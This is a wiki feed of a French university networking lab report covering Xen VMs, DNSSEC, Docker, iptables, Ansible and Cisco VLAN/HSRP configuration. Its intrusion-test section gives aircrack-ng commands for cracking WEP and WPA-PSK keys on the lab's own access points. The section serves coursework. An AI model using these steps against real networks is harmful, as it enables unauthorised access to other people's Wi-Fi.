/!\ Il faut la garder précieusement et ne pas la SUPPRIMER des fichiers de la machine virtuelle, dans ce cas il faudra tout recommencer avec un nouveau nom de domaine parce que la clef n'est générable qu'une seule fois.&lt;br /&gt;
Il faut maintenant copier le contenu de ce fichier avec le &amp;quot;BEGIN CERTIFICATE REQUEST-----&amp;quot; et le &amp;quot;END CERTIFICATE REQUEST-----&amp;quot; sur le site de gandi.&lt;br /&gt;
&lt;br /&gt;
===Sécurisation de serveur DNS par DNSSEC===&lt;br /&gt;
 root@mycoplasma:/etc/bind# vim named.conf&lt;br /&gt;
&lt;br /&gt;
 include &amp;quot;/etc/bind/named.conf.options&amp;quot;;&lt;br /&gt;
 include &amp;quot;/etc/bind/named.conf.local&amp;quot;;&lt;br /&gt;
 include &amp;quot;/etc/bind/named.conf.default-zones&amp;quot;&lt;br /&gt;
&lt;br /&gt;
Pour générer les clefs dans un même dossier, il faut le créer voici le chemin pour notre groupe :&lt;br /&gt;
 root@mycoplasma:/etc/bind/mycoplasma2.site.dnssec# &lt;br /&gt;
&lt;br /&gt;
Pour générer les clés KSK on lance la commande suivante :&lt;br /&gt;
 dnssec-keygen -a RSASHA1 -b 2048 -f KSK -n ZONE mycoplasma2.site&lt;br /&gt;
Pour ZSK :&lt;br /&gt;
 dnssec-keygen -a RSASHA1 -b 1048 -n ZONE mycoplasma2.site&lt;br /&gt;
&lt;br /&gt;
On peut maintenant rajouter nos clefs dans le fichier mycoplasma2.site: &lt;br /&gt;
&lt;br /&gt;
 root@mycoplasma:~# cat /etc/bind/mycoplasma2.site&lt;br /&gt;
&lt;br /&gt;
 $TTL	604800&lt;br /&gt;
 '''$include /etc/bind/mycoplasma2.site.dnssec/mycoplasma2.site-ksk.key'''&lt;br /&gt;
 '''$include /etc/bind/mycoplasma2.site.dnssec/mycoplasma2.site-zsk.key'''&lt;br /&gt;
 @	IN	SOA	ns.chlamydiae.site. root.mycoplasma2.site (&lt;br /&gt;
  			4	; Serial&lt;br /&gt;
 			604800	; Refresh&lt;br /&gt;
 			86400	; Retry&lt;br /&gt;
 			2419200	; Expire&lt;br /&gt;
 			604800 )	; Negative Cache TTL&lt;br /&gt;
 ;&lt;br /&gt;
 	IN	NS	ns.mycoplasma2.site.&lt;br /&gt;
 	IN	NS	ns6.gandi.net.&lt;br /&gt;
 @      IN      A       193.48.57.178&lt;br /&gt;
 ns	IN	A	193.48.57.178&lt;br /&gt;
 www	IN	A	193.48.57.178&lt;br /&gt;
&lt;br /&gt;
On signe les enregistrements de la zone en exécutant la commande suivante :&lt;br /&gt;
 dnssec-signzone -o mycoplasma2.site -k mycoplasma2.site-ksk ../mycoplasma2.site mycoplasma2.site-zsk&lt;br /&gt;
&lt;br /&gt;
Dernière étape, il fait ajouter le chemin du fichier pour utiliser le fichier de zone signé :&lt;br /&gt;
&lt;br /&gt;
 root@mycoplasma:~# cat /etc/bind/named.conf.local &lt;br /&gt;
&lt;br /&gt;
 zone &amp;quot;mycoplasma2.site&amp;quot; {&lt;br /&gt;
        type master;&lt;br /&gt;
        '''file &amp;quot;/etc/bind/mycoplasma2.site.signed&amp;quot;;''' &lt;br /&gt;
        allow-transfer {217.70.177.40;}; &lt;br /&gt;
 };&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
 service bind9 restart&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Nous vérifions sous dnsviz.net le bon fonctionnement du DNSSEC :&lt;br /&gt;
[[Fichier:groupe2_dnsViz.png|center|500px]]&lt;br /&gt;
&lt;br /&gt;
===Serveur Freeradius===&lt;br /&gt;
&lt;br /&gt;
==Ferme de serveurs Web==&lt;br /&gt;
Il faut implanter une architecture d’équilibrage de charge pour un site Web.&lt;br /&gt;
&lt;br /&gt;
===Architecture générale de la ferme===&lt;br /&gt;
Pour ce faire, chaque binôme a créé une nouvelle machine virtuelle Xen qui hébergera un serveur Web. Ainsi chaque binôme pourra disposer de plusieurs serveurs Web proposant exactement le même site sur plusieurs machines différentes. Ces serveurs Web ne seront pas directement disponibles d’Internet mais au travers d’un équilibreur de charge tournant sur leur machine virtuelle principale.&lt;br /&gt;
&lt;br /&gt;
'''Nom de la Machine Virtuelle ''' : private-mycoplasma&lt;br /&gt;
&lt;br /&gt;
'''Commandes''': &lt;br /&gt;
La MV doit être créée sur Cordouan.&lt;br /&gt;
 root@zabethX:~# ssh root@cordouan.insecserv.deule.net &lt;br /&gt;
&lt;br /&gt;
 root@cordouan:~# xen-create-image --hostname=private-mycoplasma --ip=ip 192.168.0.2 --dir=/usr/local/xen&lt;br /&gt;
 root@cordouan:~# xl create private-mlycoplasma.cfg&lt;br /&gt;
&lt;br /&gt;
Il faut suivre les logs de la création de la machine virtuelle avec le fichier suivant:&lt;br /&gt;
 root@cordouan:~# tail -f /var/log/xen-tools/private-mycoplasma.log&lt;br /&gt;
&lt;br /&gt;
Pour accèder une première fois à la machine virtuelle, il faut utiliser cette commande car SSH n'est pas encore autorisé.&lt;br /&gt;
 root@cordouan:~# xl console private-mycoplasma&lt;br /&gt;
&lt;br /&gt;
Pour l'activer voici les modifications, il faut remplacer la ligne suivante de ce fichier /etc/ssh/sshd_config :&lt;br /&gt;
 &amp;quot; #PermitRootLogin prohibit-password&amp;quot;  '''par'''  &amp;quot; PermitRootLogin yes&amp;quot; &lt;br /&gt;
&lt;br /&gt;
Il est possible de se connecter en SSH  et de paramétrer le proxy : &lt;br /&gt;
 root@cordouan:~# ssh root@192.168.0.2&lt;br /&gt;
 root@private-mycoplasma:~# export http_proxy=http://proxy.plil.fr:3128&lt;br /&gt;
 root@private-mycoplasma:~# export https_proxy=http://proxy.plil.fr:3128&lt;br /&gt;
 root@private-mycoplasma:~# xen-create-image --hostname=herpesgenital --dhcp --dir=/usr/local/xen --force&lt;br /&gt;
&lt;br /&gt;
Il faut modifier l'adresse mac, pour avoir une adresse mac unique pour chaque binôme, et il faut configurer le bridge.&lt;br /&gt;
 vif = [ 'mac=00:16:3E:2B:FF:6A,bridge=IMA5sc-priv' ]&lt;br /&gt;
&lt;br /&gt;
Voici notre nouvelle structure :&lt;br /&gt;
[[Fichier:G2_Structure.png|center|800px]]&lt;br /&gt;
&lt;br /&gt;
Pour y arriver, il faut modifier les fichiers /etc/network/interfaces des deux machines virtuelles avec les adresses, Gateway, et netmask marque sur la photo ci-dessus. Et valider les modifications avec les commandes habituelles : ifdown eth'''i''' et ifup eth'''i'''&lt;br /&gt;
&lt;br /&gt;
=== Mascarade ===&lt;br /&gt;
&lt;br /&gt;
 iptables -P FORWARD DROP&lt;br /&gt;
 iptables -A FORWARD -j ACCEPT -s 192.168.0.0/24&lt;br /&gt;
 iptables -A FORWARD -j ACCEPT -d 192.168.0.0/24&lt;br /&gt;
 iptables -t nat -A POSTROUTING -j MASQUERADE -s 192.168.0.0/24&lt;br /&gt;
 echo 1 &amp;gt; /proc/sys/net/ipv4/ip_forward&lt;br /&gt;
 apt install iptables-persistent&lt;br /&gt;
 &lt;br /&gt;
Il faut ensuite décommenter &lt;br /&gt;
 net.ipv4.ipforward=1&lt;br /&gt;
&lt;br /&gt;
=== Création du conteneur ===&lt;br /&gt;
&lt;br /&gt;
Il est important dans cette partie que tous les binômes se mettent d'accord pour installer le même package de docker &lt;br /&gt;
 root@mycoplasma:~/#  ansible-galaxy install geerlingguy.docker&lt;br /&gt;
&lt;br /&gt;
Voici le fichier DockerFile que l'on a codé :&lt;br /&gt;
&lt;br /&gt;
 root@mycoplasma:~/test# cat docker/Dockerfile &lt;br /&gt;
&lt;br /&gt;
 FROM centos:latest&lt;br /&gt;
 MAINTAINER NewstarCorporation&lt;br /&gt;
 RUN yum -y install httpd&lt;br /&gt;
 COPY mycoplasma/index.html /var/wwww/html/index.html&lt;br /&gt;
 CMD [&amp;quot;/usr/sbin/httpd&amp;quot;, &amp;quot;-D&amp;quot;, &amp;quot;FOREGROUND&amp;quot;]&lt;br /&gt;
 EXPOSE 80&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
On a eu le problème suivant lorsqu'on souhaite visiter notre site : &lt;br /&gt;
&lt;br /&gt;
[[Fichier:G2_mycoplasmaSite.png|center|900px]]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
 root@corduan:~/# docker ps =&amp;gt; Notre docker &amp;quot;mycoplasma&amp;quot;  tourne donc  ce n'est pas le problème.&lt;br /&gt;
&lt;br /&gt;
 root@corduan:~/# docker exec -it &amp;lt;CONTAINER ID&amp;gt; /bash/bin &lt;br /&gt;
 root@&amp;lt;CONTAINER ID&amp;gt;:~/# ls /var/www/html &lt;br /&gt;
&lt;br /&gt;
Avec cette dernière commande, on peut voir que le fichier index.html ne s'est pas copié malgré les commandes du Dockerfile. Pourtant le Docker build s'est exécuté sans afficher d'erreurs. On peut voir les logs pour avoir une idée : &lt;br /&gt;
  root@corduan:~/# docker logs &amp;lt;CONTAINER ID&amp;gt;&lt;br /&gt;
Voici le résultat : &lt;br /&gt;
 AH00558: httpd: Could not reliably determine the server's fully qualified domain name, using 172.17.0.5. Set the 'ServerName' directive globally to suppress this message&lt;br /&gt;
&lt;br /&gt;
=== Configuration des serveurs internes ===&lt;br /&gt;
&lt;br /&gt;
===Equilibreur de charge===&lt;br /&gt;
&lt;br /&gt;
==Tests d’intrusion==&lt;br /&gt;
&lt;br /&gt;
=== Cassage de clef WEP d’un point d’accès WiFi ===&lt;br /&gt;
Pour scanner l'environnement Wi-Fi, on utilise l'outil airodump-ng. On remarque qu'il y a deux types de wifi, les cracottes avec un c et les kracottes avec un k.&lt;br /&gt;
On lance l'interface en mode moniteur : &lt;br /&gt;
 airmon-ng start  wlan0mon&lt;br /&gt;
 airodump-ng --encrypt wep wlan0mon&lt;br /&gt;
&lt;br /&gt;
On a choisi de casser la clé WEP de la cracotte5 sur le channel 2, on enregistre les paquets dans webPack.&lt;br /&gt;
 airodump-ng -c 2 –-bssid 04:DA:D2:9C:5O:5A -w wepPack wlan0mon&lt;br /&gt;
&lt;br /&gt;
La commande suivante permet de se faire passer pour un client afin de générer de l'activité sur le réseau.&lt;br /&gt;
 aireplay-ng --fakeauth 30 -a 04:DA:D2:9C:5O:5A wlan0mon&lt;br /&gt;
&lt;br /&gt;
On utilise les paquets enregistrés pour réaliser le cassage:&lt;br /&gt;
 aircrack-ng wepDico*.cap&lt;br /&gt;
&lt;br /&gt;
[[Fichier:g2_wep.png|center|600 px]]&lt;br /&gt;
&lt;br /&gt;
=== Cassage de mot de passe WPA-PSK par force brute ===&lt;br /&gt;
Il faut lancer la commande ip a : récupérer le nom de l'interface wifi : &amp;quot;&amp;quot;wlx40a5ef0f6518&amp;quot;&amp;quot;. Il faut le lancer avec la commande :&lt;br /&gt;
 airmon-ng start wlx40a5ef0f6518&lt;br /&gt;
&lt;br /&gt;
Il faut ensuite écouter le réseau, on récupère alors le channel(2), le nom du wifi, le BSSID (04:DA:D2:9C:5O:5A) avec la commande suivante:&lt;br /&gt;
 airodump-ng --encrypt wpa wlan0mon&lt;br /&gt;
Nous avons choisi de cracker &amp;quot;kracote03&amp;quot;&lt;br /&gt;
&lt;br /&gt;
 airodump-ng wlan0mon --bssid 04:DA:D2:9C:5O:5A --ch 2 -w capture&lt;br /&gt;
&lt;br /&gt;
Il faut l'arreter une fois qu'on obtient un handshake &lt;br /&gt;
&lt;br /&gt;
[[Fichier:G2_WPA.png| 800 px|center]]&lt;br /&gt;
&lt;br /&gt;
Pour générer un dictionnaire, on a besoin de la commande suivante : &lt;br /&gt;
 sudo apt-get update&lt;br /&gt;
 sudo apt-get install crunch&lt;br /&gt;
&lt;br /&gt;
 crunch 8 8 -o dico.txt 0123456789&lt;br /&gt;
&lt;br /&gt;
* 8 8 : donne des codes de 8 caractères au minimum et au maximum&lt;br /&gt;
&lt;br /&gt;
On lance cette commande : &lt;br /&gt;
 airodump-ng -c 2 --bssid 04:DA:D2:9C:5O:5A -w ./home/pifou/crack wlx40a5ef0f6518&lt;br /&gt;
&lt;br /&gt;
Voici une capture de la commande :&lt;br /&gt;
 aircrack crack/capture.cap -w dico.txt &lt;br /&gt;
[[Fichier:G2_catch.png|center]]&lt;br /&gt;
&lt;br /&gt;
On remarque ce la photo ci dessus que la commande a pris 21 min et 42 sec.&lt;br /&gt;
&lt;br /&gt;
== Partie  ASR ==&lt;br /&gt;
&lt;br /&gt;
=== Ansible ===&lt;br /&gt;
&lt;br /&gt;
Ansible permet l'automatisation par connexion sans mot de passe.&lt;br /&gt;
Il faut d'abord générer une clef asymétrique :&lt;br /&gt;
 ssh-keygen -t rsa&lt;br /&gt;
&lt;br /&gt;
Installation de la clef publique sur les machines virtuelles 192.168.0.1 à 192.168.0.6  :&lt;br /&gt;
 cat .ssh/id_rsa.pub | ssh 192.168.0.1 &amp;quot;cat &amp;gt;&amp;gt; /root/.ssh/authorized_keys2&amp;quot;&lt;br /&gt;
&lt;br /&gt;
Il faut  installer Ansible : &lt;br /&gt;
 apt install ansible&lt;br /&gt;
====Hosts====&lt;br /&gt;
Ensuite il faut rédiger l'inventaire ( /etc/ansible/hosts ) c'est un fichier yaml, il faut très attention à la syntaxe. Ce fichier regroupe le parc informatique :&lt;br /&gt;
&lt;br /&gt;
 all:&lt;br /&gt;
 hosts:&lt;br /&gt;
  interne:&lt;br /&gt;
    ansible_host: 192.168.0.2&lt;br /&gt;
 children:&lt;br /&gt;
  serveur-web:&lt;br /&gt;
   hosts:&lt;br /&gt;
    192.168.0.[1:6]&lt;br /&gt;
&lt;br /&gt;
====Playbooks====&lt;br /&gt;
&lt;br /&gt;
Maintenant qu'on a défini toutes les machines dans notre parc et qu'on peut se connecter automatique, on peut exécuter une commande à distance sur tout le parc à l'aide d'Ansible.&lt;br /&gt;
Un &amp;quot;playbook&amp;quot; c'est une liste des tâches à effectuer sur ces machines.&lt;/div&gt;</summary>
		<author><name>Aaitmouh</name></author>	</entry>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5sc_2019/2020_G2&amp;diff=52011</id>
		<title>TP sysres IMA5sc 2019/2020 G2</title>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5sc_2019/2020_G2&amp;diff=52011"/>
				<updated>2020-01-05T15:07:54Z</updated>
		
		<summary type="html">&lt;p&gt;Aaitmouh : /* Configuration du commutateur 1 (COM-1) */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;__TOC__&lt;br /&gt;
&amp;lt;br style=&amp;quot;clear: both;&amp;quot;/&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=Présentation générale=&lt;br /&gt;
&lt;br /&gt;
Travaux pratiques protocoles avancés. Cet atelier consiste en la réalisation d’une maquette de réseau permettant de manipuler les protocoles de redondance réseau ainsi que le protocole réseau IPv6.&lt;br /&gt;
&lt;br /&gt;
Le cours se trouve à cette [https://rex.plil.fr/Enseignement/Reseau/Reseau.IMA5sc/ adresse]&lt;br /&gt;
Le sujet du TP se trouve à cette [https://rex.plil.fr/Enseignement/Reseau/Protocoles.IMA5sc/reseau.html adresse]&lt;br /&gt;
&lt;br /&gt;
=Réalisation du TP=&lt;br /&gt;
&lt;br /&gt;
== Installation dans la machine virtuelle Xen ==&lt;br /&gt;
Nous avons acheté notre domaine : mycoplasma.site sur le site gandi. Il faut créer la machine virtuelle Xen Linux sur le ''dom0 cordouan.insecserv.deule.net''&lt;br /&gt;
&lt;br /&gt;
Donc il faut se connecter en shh à Cordouan: &lt;br /&gt;
 ssh root@cordouan.insecserv.deule.net&lt;br /&gt;
&lt;br /&gt;
Puis créer notre machine virtuelle : &lt;br /&gt;
 xen-create-image --hostname=mycoplasma --dhcp --dir=/usr/local/xen --dist=buster&lt;br /&gt;
 xl create mycoplasma.cfg&lt;br /&gt;
&lt;br /&gt;
On a ensuite installer les paquetages nécessaires pour SSH, le serveur Web apache2 et le serveur DNS bind :&lt;br /&gt;
 sudo apt-get install openssh-server&lt;br /&gt;
 sudo apt-get install apache2&lt;br /&gt;
 sudo apt-get install -y bind9&lt;br /&gt;
&lt;br /&gt;
Pour afficher les logs et savoir si l'installation à bien lieu : &lt;br /&gt;
   tail -f /var/log/xen-tools/mycoplasma.log&lt;br /&gt;
=== Accès Internet et Permettre SSH ===&lt;br /&gt;
Une fois la VM créée (semaine 1), il faut installer les packages, donc il faut lui donner l'accès à internet. Il faut modifier le fichier suivant etc/network/interfaces. Pour enregistrer les modifications, il faut exécuter les commandes: if down eth0, ifup eth0.&lt;br /&gt;
 &lt;br /&gt;
 auto eth0&lt;br /&gt;
 iface eth0 inet static&lt;br /&gt;
  address 193.48.57.178&lt;br /&gt;
  netmask 255.255.255.240&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Pour le moment, pour se connecter à la Machine virtuelle, on utilise la commande suivante: &lt;br /&gt;
 xl console mycoplasma&lt;br /&gt;
&lt;br /&gt;
====SSH====&lt;br /&gt;
Mais il y a une seconde façon d'accéder à notre VM: c'est en utilisant SSH. Pour le faire il faut remplacer la ligne suivante :&lt;br /&gt;
 &amp;quot; #PermitRootLogin prohibit-password&amp;quot; &lt;br /&gt;
par &lt;br /&gt;
 &amp;quot; PermitRootLogin yes&amp;quot; &lt;br /&gt;
de ce fichier etc/ssh/sshd_config.&lt;br /&gt;
&lt;br /&gt;
== Architecture réseau ==&lt;br /&gt;
&lt;br /&gt;
=== L’architecture générale ===&lt;br /&gt;
[[Fichier:mejbar-aitmouheb-infra-generale.png|right|180 px|thumb]]&lt;br /&gt;
L'objectif que l'on souhaite réaliser dans cette partie est une architecture capable de résister à la défaillance de quelques uns des équipements réseau qui la composent par le biais de la redondance.&lt;br /&gt;
&lt;br /&gt;
Nous disposons, pour la réalisation, de deux commutateurs et de deux routeurs et deux bornes wifi répartis entre les deux salles E304 et E306. &lt;br /&gt;
&lt;br /&gt;
Nous avons sur les deux terminaisons de notre architecture:&lt;br /&gt;
&lt;br /&gt;
* Le serveur XEN qui abrite des machines virtuelles avec les différents services qui y sont implantés.&lt;br /&gt;
* Le réseau de l'école.&lt;br /&gt;
 &lt;br /&gt;
&lt;br /&gt;
Le schéma de principe ci-joint, résume l'architecture proposée.&lt;br /&gt;
&lt;br /&gt;
On peut ainsi voir à partir de ce schéma que tant que nous avons au minimum un routeur et un commutateur fonctionnels l’infrastructure pourra toujours assurer le service&lt;br /&gt;
&lt;br /&gt;
Entre autres, on doit satisfaire le cahier des charges suivant:&lt;br /&gt;
* Un routage IPv4&lt;br /&gt;
* Un routage IPv6&lt;br /&gt;
* Interconnexion avec Internet (IPv4)&lt;br /&gt;
* Interconnexion avec Internet (IPv6)&lt;br /&gt;
* Sécurisation du réseau en implantant le protocol VRRP sur les routeurs.&lt;br /&gt;
* Confguration des bornes wifi&lt;br /&gt;
&lt;br /&gt;
===Organisation du travail ===&lt;br /&gt;
[[Fichier:mejbar-aitmouheb-infra-E304.png|right|180 px|thumb]]&lt;br /&gt;
Nous avons pris l'initiative de nous répartir la réalisation de l'infrastructure et notre groupe s'est principalement chargé de l'implémentation sur la partie E304.&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
Sur cette partie nous devons donc configurer le commutateur (COM-1) pour:&lt;br /&gt;
* Communiquer avec la serveur XEN&lt;br /&gt;
* Communiquer avec le routeur R1 en E304 et le R2 en E306.&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
Et configurer le routeur R1 pour:&lt;br /&gt;
* L'interconnexion des deux commutateurs COM-1 et COM-2 avec le réseau de l'école et internet &lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
Le schéma proposé à droite résume le choix des interfaces pour la réalisation de l'interconnexion des équipements.&lt;br /&gt;
&lt;br /&gt;
===Réalisation===&lt;br /&gt;
Rappelons la table des adressages convenue en phase d'architecture:&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot;&lt;br /&gt;
! Nom !! VLAN !! Réseau IPV4 !! Réseau IPV6 !! IP routeur 1 !! IP routeur 2 !! Routeur virtuel !! Nom VM !! IP VM !! IP VM Private&lt;br /&gt;
|-&lt;br /&gt;
| XEN&lt;br /&gt;
| 200&lt;br /&gt;
| 193.48.57.176/28 &lt;br /&gt;
| 2001:660:4401:60AB::/64 &lt;br /&gt;
| 193.48.57.188/28&lt;br /&gt;
| 193.48.57.189/28&lt;br /&gt;
| 193.48.57.190/28&lt;br /&gt;
| ***&lt;br /&gt;
| 193.48.57.176/28&lt;br /&gt;
| ***&lt;br /&gt;
|-&lt;br /&gt;
| Interconnection&lt;br /&gt;
| 131&lt;br /&gt;
| 10.60.100.0/24&lt;br /&gt;
| ***&lt;br /&gt;
| 10.60.100.1/24&lt;br /&gt;
| 10.60.100.2/24&lt;br /&gt;
| ***&lt;br /&gt;
| ***&lt;br /&gt;
| ***&lt;br /&gt;
| ***&lt;br /&gt;
|-&lt;br /&gt;
| Groupe 1&lt;br /&gt;
| 101 &lt;br /&gt;
| 10.60.101.0/24&lt;br /&gt;
| 2001:660:4401:60A1::/64 &lt;br /&gt;
| 10.60.101.1/24&lt;br /&gt;
| 10.60.101.2/24&lt;br /&gt;
| 10.60.101.3/24&lt;br /&gt;
| 6phil&lt;br /&gt;
| 193.48.57.177/28&lt;br /&gt;
| 192.168.0.1&lt;br /&gt;
|-&lt;br /&gt;
| Groupe 2&lt;br /&gt;
| 102&lt;br /&gt;
| 10.60.102.0/24&lt;br /&gt;
| 2001:660:4401:60A2::/64 &lt;br /&gt;
| 10.60.102.1/24&lt;br /&gt;
| 10.60.102.2/24&lt;br /&gt;
| 10.60.102.3/24&lt;br /&gt;
| mycoplasma&lt;br /&gt;
| 193.48.57.178/28&lt;br /&gt;
| 192.168.0.2&lt;br /&gt;
|-&lt;br /&gt;
| Groupe 3&lt;br /&gt;
| 103 &lt;br /&gt;
| 10.60.103.0/24&lt;br /&gt;
| 2001:660:4401:60A3::/64&lt;br /&gt;
| 10.60.103.1/24&lt;br /&gt;
| 10.60.103.2/24&lt;br /&gt;
| 10.60.103.3/24&lt;br /&gt;
| herpesgenital&lt;br /&gt;
| 193.48.57.179/28&lt;br /&gt;
| 192.168.0.3&lt;br /&gt;
|-&lt;br /&gt;
| Groupe 4&lt;br /&gt;
| 104 &lt;br /&gt;
| 10.60.104.0/24&lt;br /&gt;
| 2001:660:4401:60A4::/64 &lt;br /&gt;
| 10.60.104.1/24&lt;br /&gt;
| 10.60.104.2/24&lt;br /&gt;
| 10.60.104.3/24&lt;br /&gt;
| chlamydiae&lt;br /&gt;
| 193.48.57.180/28&lt;br /&gt;
| 192.168.0.4&lt;br /&gt;
|-&lt;br /&gt;
| Groupe 5&lt;br /&gt;
| 105 &lt;br /&gt;
| 10.60.105.0/24&lt;br /&gt;
| 2001:660:4401:60A5::/64 &lt;br /&gt;
| 10.60.105.1/24&lt;br /&gt;
| 10.60.105.2/24&lt;br /&gt;
| 10.60.105.3/24&lt;br /&gt;
| chaudepisse&lt;br /&gt;
| 193.48.57.181/28&lt;br /&gt;
| 192.168.0.5&lt;br /&gt;
|-&lt;br /&gt;
| Groupe 6&lt;br /&gt;
| 106 &lt;br /&gt;
| 10.60.106.0/24&lt;br /&gt;
| 2001:660:4401:60A6::/64 &lt;br /&gt;
| 10.60.106.1/24&lt;br /&gt;
| 10.60.106.2/24&lt;br /&gt;
| 10.60.106.3/24&lt;br /&gt;
| blennoragie&lt;br /&gt;
| 193.48.57.182/28&lt;br /&gt;
| 192.168.0.6&lt;br /&gt;
|-&lt;br /&gt;
| Autres&lt;br /&gt;
| 300&lt;br /&gt;
| 10.60.200.0/24&lt;br /&gt;
| 2001:660:4401:60AA::/64 &lt;br /&gt;
| 10.60.200.1/24&lt;br /&gt;
| 10.60.200.2/24&lt;br /&gt;
| 10.60.200.3/24&lt;br /&gt;
| ***&lt;br /&gt;
| ***&lt;br /&gt;
| ***&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
Comme on peut le voir, les VMs exposées possèdent chacune deux adresses IPv4 sur deux réseaux différents:&lt;br /&gt;
#Le réseau routé     :  193.48.57.176/28      (Class C)&lt;br /&gt;
#Le réseau non-routé :  10.10.0.0/16          (Class A)&lt;br /&gt;
&lt;br /&gt;
Nous devons allouer sur le réseau non-routé, dit privé, un VLAN pour chaque groupe pour qu'il puisse y connecter son client Wifi en plus des VLANs fonctionnels.&lt;br /&gt;
 &lt;br /&gt;
&lt;br /&gt;
----&lt;br /&gt;
&lt;br /&gt;
====Configuration du commutateur 1 (COM-1)====&lt;br /&gt;
&lt;br /&gt;
=====Création des VLANs=====&lt;br /&gt;
Pour la création des VLANs nous utilisons la suite de commandes ci-dessous:&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
  vlan &amp;lt;NUMERO&amp;gt;&lt;br /&gt;
   name &amp;lt;NOM&amp;gt;&lt;br /&gt;
   exit&lt;br /&gt;
  exit&lt;br /&gt;
 write&lt;br /&gt;
&lt;br /&gt;
avec les couples de valeurs:&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot;&lt;br /&gt;
! &amp;lt;NUMERO&amp;gt; !! &amp;lt;NOM&amp;gt; &lt;br /&gt;
|-&lt;br /&gt;
| 101&lt;br /&gt;
| VLAN0101&lt;br /&gt;
|-&lt;br /&gt;
| 102&lt;br /&gt;
| VLAN0102 &lt;br /&gt;
|-&lt;br /&gt;
| 103&lt;br /&gt;
| VLAN0103&lt;br /&gt;
|-&lt;br /&gt;
| 104&lt;br /&gt;
| VLAN0104&lt;br /&gt;
|-&lt;br /&gt;
| 105&lt;br /&gt;
| VLAN0105&lt;br /&gt;
|-&lt;br /&gt;
| 106&lt;br /&gt;
| VLAN0106&lt;br /&gt;
|-&lt;br /&gt;
| 131&lt;br /&gt;
| INTERCNX&lt;br /&gt;
|-&lt;br /&gt;
| 200&lt;br /&gt;
| XEN&lt;br /&gt;
|-&lt;br /&gt;
| 300&lt;br /&gt;
| MANAGEMENT&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
Donner au commutateur 1 une IP dans le Vlan de management : &lt;br /&gt;
&lt;br /&gt;
 conf t &lt;br /&gt;
  interface Vlan300&lt;br /&gt;
  ip address 10.60.200.254 255.255.255.0&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
En première approche, nous avons souhaité activer une connexion sécurisée (SSH) de management en créant des clés RSA et une configuration VTY mais le commutateur n'a pas l'air, à première vue, d'implémenter cette fonctionnalité  nous laissant qu'avec du Telnet (en Clair) que nous avons donc décidé de ne pas configurer.&lt;br /&gt;
&lt;br /&gt;
=====Liaison COM-1 vers XEN=====&lt;br /&gt;
Cette connexion doit faire transiter les différents VLANs et doit donc être en Trunk.&lt;br /&gt;
&lt;br /&gt;
'''Configuration de l'interface'''&lt;br /&gt;
 conf t&lt;br /&gt;
  interface GigabitEthernet1/1&lt;br /&gt;
   switchport&lt;br /&gt;
   switchport trunk encapsulation dot1q         # On utilise le standard 802.1q pour l'encapsulation&lt;br /&gt;
   switchport mode trunk                        # On met l'interface en mode Trunk&lt;br /&gt;
   no shut&lt;br /&gt;
&lt;br /&gt;
=====Liaison COM-1 vers R1=====&lt;br /&gt;
'''Configuration de l'interface'''&lt;br /&gt;
 conf t&lt;br /&gt;
  interface GigabitEthernet4/1&lt;br /&gt;
   switchport&lt;br /&gt;
   switchport mode trunk&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
=====Liaison COM-1 vers R2=====&lt;br /&gt;
'''Configuration de l'interface'''&lt;br /&gt;
 conf t&lt;br /&gt;
 interface GigabitEthernet1/2&lt;br /&gt;
  switchport&lt;br /&gt;
  switchport trunk encapsulation dot1q&lt;br /&gt;
  switchport mode trunk&lt;br /&gt;
&lt;br /&gt;
=====Liaison COM-1 vers Borne Wifi=====&lt;br /&gt;
'''Configuration de l'interface'''&lt;br /&gt;
 conf t&lt;br /&gt;
  interface GigabitEthernet4/4&lt;br /&gt;
   switchport&lt;br /&gt;
   switchport mode trunk&lt;br /&gt;
&lt;br /&gt;
=====Management=====&lt;br /&gt;
&lt;br /&gt;
====Configuration du Routeur 1 (R1)====&lt;br /&gt;
&lt;br /&gt;
=====Création des Réseaux virtuels=====&lt;br /&gt;
La notion de Bridge Domain Interface (BDI)&lt;br /&gt;
&lt;br /&gt;
HSRP: Hot standby router protocol [https://en.wikipedia.org/wiki/Hot_Standby_Router_Protocol plus]&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
  interface BDI101&lt;br /&gt;
   ip address 10.60.101.1 255.255.255.0                # adresse IPv4 locale&lt;br /&gt;
   standby version 2                                   # utilisation du protocol HSRP version 2 pour la haute disponibilité dans le cas où un routeur tombe en panne&lt;br /&gt;
   standby 101 ip 10.60.101.3                          # on définit un standby group pour cette interface avec l'adresse du routeur virtuel&lt;br /&gt;
   standby 101 preempt                                 # fait en sorte que le routeur actif avec la plus grande priorité prenne en charge le routage par préemption sur ce groupe &lt;br /&gt;
   ipv6 address 2001:660:4401:60A1::/64 eui-64         # configuration des adresses IPv6&lt;br /&gt;
   ipv6 enable&lt;br /&gt;
   ipv6 nd prefix 2001:660:4401:60A1::/64 1000 900&lt;br /&gt;
   ipv6 nd router-preference High&lt;br /&gt;
   no shut &lt;br /&gt;
   exit&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
  interface BDI102&lt;br /&gt;
   ip address 10.60.102.1 255.255.255.0&lt;br /&gt;
   standby version 2&lt;br /&gt;
   standby 102 ip 10.60.102.3&lt;br /&gt;
   standby 102 preempt&lt;br /&gt;
   ipv6 address 2001:660:4401:60A2::/64 eui-64&lt;br /&gt;
   ipv6 enable&lt;br /&gt;
